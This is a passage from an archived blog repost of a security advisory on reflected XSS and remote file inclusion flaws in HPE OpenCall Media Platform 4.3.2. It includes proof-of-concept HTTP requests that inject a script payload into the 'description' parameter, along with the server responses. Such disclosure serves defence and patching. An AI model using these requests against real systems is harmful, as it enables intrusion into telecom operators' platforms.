{"id":7431,"date":"2017-04-24T14:19:10","date_gmt":"2017-04-24T22:19:10","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/04\/24\/news-1222\/"},"modified":"2017-04-24T14:19:10","modified_gmt":"2017-04-24T22:19:10","slug":"news-1222","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/04\/24\/news-1222\/","title":{"rendered":"SSD Advisory \u2013 HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Mon, 24 Apr 2017 05:57:39 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3087\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3087');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes Reflected Cross-Site Scripting (XSS) vulnerabilities and a Remote File Inclusion vulnerability that when combined can lead to arbitrary Javascript code execution, were found in HP OpenCall Media Platform (OCMP), version 4.3.2.<\/p>\n<p>HPE OpenCall Media Platform (OCMP) is a suite of software and hardware applications which allow implementation of common telecom operator services such as voicemail, sms (short message service), prepaid, billing, hlr, etc. It implements industry standard telecom protocols and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML.<\/p>\n<p>HPE OpenCall Media Platform offers a highly scalable, easy-to-manage, carrier-grade media platform that adapts to future networks and applications. Through its strong support of open standards and protocols, new applications can be rapidly developed and deployed in a way that preserves investments and reduces capital expenditures (CAPEX) and operational expenditure (OPEX).<\/p>\n<p>There are 3 different components that are vulnerable in HPE OpenCall Media Platform (OCMP), and for each component has the following vulnerabilities:<\/p>\n<ul>\n<li><strong>Application Content Manager<\/strong><\/li>\n<\/ul>\n<ol>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>\/mcm\/resources\/<\/em><\/li>\n<\/ol>\n<p><br class=\"blank\" \/><\/p>\n<ul>\n<li><strong>Platform Administration Tool<\/strong><\/li>\n<\/ul>\n<ol>\n<li>Reflected Cross-Site Scripting (XSS) that leads to arbitrary Javascript code execution<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_TYPE0<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_TYPE1<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_TYPE2<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_TYPE3<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_NAME0<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_NAME1<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_NAME2<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_NAME3<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>LEV_NUM<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>GetMapAction<\/em> function, <em>NAME<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>cdrdispatch<\/em> function, <em>next<\/em> parameter<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>cdrdispatch<\/em> function, <em>sessionType<\/em> parameter<\/li>\n<\/ol>\n<p><br class=\"blank\" \/><\/p>\n<ul>\n<li><strong>VoiceXML Administration Tool<\/strong> <\/li>\n<\/ul>\n<ol>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>event.do<\/em> function<\/li>\n<li>Reflected Cross-Site Scripting (XSS) &#8211; <em>call.do<\/em> function<\/li>\n<li>Remote File Inclusion &#8211; <em>proxylink.do<\/em> function<\/li>\n<\/ol>\n<p><br class=\"blank\" \/><\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher Paolo Stagno from VoidSec has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor Responses<\/strong><br \/> HPE has released patches to address this vulnerability, for more details see:<br \/> <a href=\"https:\/\/h20564.www2.hpe.com\/hpsc\/doc\/public\/display?docId=emr_na-hpesbgn03686en_us\" target=\"_blank\" rel=\"noopener noreferrer\">https:\/\/h20564.www2.hpe.com\/hpsc\/doc\/public\/display?docId=emr_na-hpesbgn03686en_us<\/a><\/p>\n<p><span id=\"more-3087\"><\/span><\/p>\n<p><strong>Vulnerabilities Details<\/strong><\/p>\n<p><strong>Application Content Manager &#8211; <em>\/mcm\/resources\/<\/em><\/strong><br \/> HPE OpenCall Media Platform (OCMP) does not sanitize <em>\/mcm\/resources\/<\/em>\u00a0<em>&#8220;description&#8221;<\/em> and <em>&#8220;prototype&#8221; parameters input. An attacker can inject malicious Javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following POST request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da835c8069707424\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST https:\/\/127.0.0.1:8443\/mcm\/resources\/dummy_test\/dummy\/test?followindirection=false HTTP\/1.1  Host: 127.0.0.1:8443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: *\/*  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  Content-Type: application\/mcm+json; charset=UTF-8  X-Requested-With: XMLHttpRequest  Referer: https:\/\/127.0.0.1:8443\/mcm\/tenant\/mcmcontent.html  Content-Length: 54  Connection: keep-alive  Pragma: no-cache  Cache-Control: no-cache    { &#8220;&#8221;: &#8220;&#8221;, &#8220;description&#8221;: &#8220;&lt;script&gt;alert(1);&lt;\/script&gt;&#8221;}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0072 seconds] -->  <\/p>\n<p>The server will respond with:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da835de342737262\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 204 No Content  X-Powered-By: Servlet 2.5; JBoss-5.0\/JBossWeb-2.1  Date: Wed, 23 Sep 2015 16:13:35 GMT  Server: Web Server<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835de342737262-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835de342737262-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835de342737262-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835de342737262-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da835de342737262-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">204<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-i\">Content<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835de342737262-2\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Powered<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">By<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Servlet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2.5<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JBoss<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">JBossWeb<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835de342737262-3\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Wed<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Sep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">35<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835de342737262-4\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Web <\/span><span class=\"crayon-v\">Server<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p>Then the attacker will send the second request to trigger the Cross-Site Scripting (XSS):<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da835e6820458364\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET https:\/\/127.0.0.1:8443\/mcm\/resources\/dummy_test\/dummy\/test?format=json&amp;followindirection=false&amp;ms=1443024815924 HTTP\/1.1  Host: 127.0.0.1:8443  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\/20100101 Firefox\/40.0  Accept: *\/*  Accept-Language: en-US,en;q=0.5  Accept-Encoding: gzip, deflate  DNT: 1  X-Requested-With: XMLHttpRequest  Referer: https:\/\/127.0.0.1:8443\/mcm\/tenant\/mcmcontent.html  Connection: keep-alive <\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835e6820458364-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835e6820458364-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835e6820458364-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835e6820458364-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835e6820458364-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835e6820458364-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835e6820458364-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835e6820458364-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835e6820458364-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835e6820458364-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da835e6820458364-1\"><span class=\"crayon-e\">GET <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/127.0.0.1:8443\/mcm\/resources\/dummy_test\/dummy\/test?format=json&amp;followindirection=false&amp;ms=1443024815924 HTTP\/1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835e6820458364-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835e6820458364-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">40.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">40.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835e6820458364-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835e6820458364-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835e6820458364-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835e6820458364-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835e6820458364-8\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requested<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">With<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835e6820458364-9\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/127.0.0.1:8443\/mcm\/tenant\/mcmcontent.html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835e6820458364-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">alive<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<p>The server will respond with:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da835eb165529641\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  X-Powered-By: Servlet 2.5; JBoss-5.0\/JBossWeb-2.1  Cache-control: no-cache  Content-Type: application\/json  Transfer-Encoding: chunked  Date: Wed, 23 Sep 2015 16:13:35 GMT  Server: Web Server    da  {&#8220;id&#8221;:&#8221;test&#8221;,&#8221;&#8221;:&#8221;&#8221;,&#8221;haschildren&#8221;:&#8221;false&#8221;,&#8221;description&#8221;:&#8221;&lt;script&gt;alert(1);&lt;\/script&gt;&#8221;,&#8221;condition_type&#8221;:&#8221;NONE&#8221;,&#8221;lastmodified&#8221;:1443024815131,&#8221;hascontent&#8221;:&#8221;true&#8221;,&#8221;contentType&#8221;:&#8221;text\/plain&#8221;,&#8221;type&#8221;:&#8221;data&#8221;,&#8221;contentLength&#8221;:15}  0<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835eb165529641-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835eb165529641-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835eb165529641-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835eb165529641-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835eb165529641-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835eb165529641-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835eb165529641-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835eb165529641-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835eb165529641-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da835eb165529641-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da835eb165529641-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da835eb165529641-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835eb165529641-2\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Powered<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">By<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Servlet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2.5<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JBoss<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">JBossWeb<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835eb165529641-3\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835eb165529641-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">json<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835eb165529641-5\"><span class=\"crayon-v\">Transfer<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">chunked<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835eb165529641-6\"><span 